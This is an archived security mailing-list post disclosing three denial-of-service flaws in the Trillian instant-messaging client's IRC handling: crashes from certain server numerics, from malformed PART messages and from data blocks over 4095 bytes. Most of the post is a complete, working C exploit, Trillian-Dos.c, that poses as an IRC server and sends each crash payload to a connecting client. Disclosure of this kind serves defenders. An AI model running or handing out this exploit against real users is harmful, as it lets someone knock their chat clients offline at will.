lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <F22nLFU4Tabchy6NIky00002b90@hotmail.com>
From: fitzies at hotmail.com (Lance Fitz-Herbert)
Subject: *sigh* Trillian multiple DoS's flaws.

I'm beginning to wonder if the makers of the instant messaging client 
Trillian, have done any bounds checking in their code. Personally I like 
trillian, its a nice peice of software, on the outside.
Here's three more DoS attacks on trillian, exploitable via a server.
I've included some code which exploits all three.

These were tested on version .74, probably older versions are affected tho.

Multiple Raw flaws:
-------------------
There seems to be a flaw in the way trillian proccesses some IRC Raw 
Messages, the following raw's crash Trillian:

206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367

The server sends the raws in the format: ':Server <Num>'
<Num> being the one of the raw codes listed above.


Part flaw:
----------
If trillian receives a message about a user parting a channel it itself is 
not in, or if no channel is specified at all, trillian will crash.

Part Messages are sent in the form: ":nick!ident@...ress PART <Channel>"


Data buffering flaw:
--------------------
There appears to be a flaw in the way trillian buffers data from the IRC 
server. If trillian receives a block of data over 4095 bytes, trillian will 
crash.


Exploit code to reproduce flaws:
--------------------------------

/* Trillian-Dos.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits Multiple Trillian DoS Flaws:
      Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 
352, 367
      Part Flaw
      Data length flaw.

   Tested On Version .74
   Compiles with Borland 5.5 Commandline Tools.

   These Examples Will Just DoS The Trillian Client,
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

SOCKET s;

#define SERVER ":server "
#define PART ":nick!ident@...ress PART\n"

int main(int argc, char *argv[]) {
	SOCKET TempSock = SOCKET_ERROR;
	WSADATA WsaDat;
	SOCKADDR_IN Sockaddr;
	int nRet;
	char payload[4096];
	if (argc < 2) {
		usage();
		return 1;
	}
	if ((!strcmp(argv[1],"raw")) && (argc < 3) || (strcmp(argv[1],"raw")) && 
(strcmp(argv[1],"part")) && (strcmp(argv[1],"data"))) {
		usage();
		return 1;
	}

	printf("Listening on port 6667 for connections....\n");
	if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
        	printf("ERROR: WSA Initialization failed.");
		return 0;
	}


	/* Create Socket */
	s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (s == INVALID_SOCKET) {
		printf("ERROR: Could Not Create Socket. Exiting\n");
		WSACleanup();
		return 0;
	}

	Sockaddr.sin_port = htons(6667);
	Sockaddr.sin_family = AF_INET;
	Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
	if (nRet == SOCKET_ERROR) {
		printf("ERROR Binding Socket");
		WSACleanup();
		return 0;
	}

	/* Make Socket Listen */
	if (listen(s, 10) == SOCKET_ERROR) {
		printf("ERROR: Couldnt Make Listening Socket\n");
		WSACleanup();
		return 0;
	}

	while (TempSock == SOCKET_ERROR) {
	      TempSock = accept(s, NULL, NULL);
	}

	printf("Client Connected, Sending Payload\n");


	if (!strcmp(argv[1],"part")) {
		send(TempSock,PART,strlen(PART),0);
	}
	if (!strcmp(argv[1],"raw")) {
		send(TempSock,SERVER,strlen(SERVER),0);
		send(TempSock,argv[2],strlen(argv[2]),0);
		send(TempSock,"\n",1,0);
	}
	if (!strcmp(argv[1],"data")) {
		memset(payload,'A',4096);
		send(TempSock,payload,strlen(payload),0);
	}
	printf("Exiting\n");
	sleep(100);
	WSACleanup();
	return 0;
}

usage() {
		printf("\nTrillian Multiple DoS Flaws\n");
		printf("---------------------------\n");
		printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
		printf("Tested On Version .74\n\n");
		printf("Usage: Trillian-Dos <type> [num]\n");
		printf("Type: raw, part, data\n");
		printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 
333, 352, 367\n\n");
}

--end code--


----
NOTE: Because of the amount of spam i receive, i require all emails directed 
*to me* to contain the word "nospam" in the subject line somewhere. Else i 
might not get your email. thankyou.
----

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ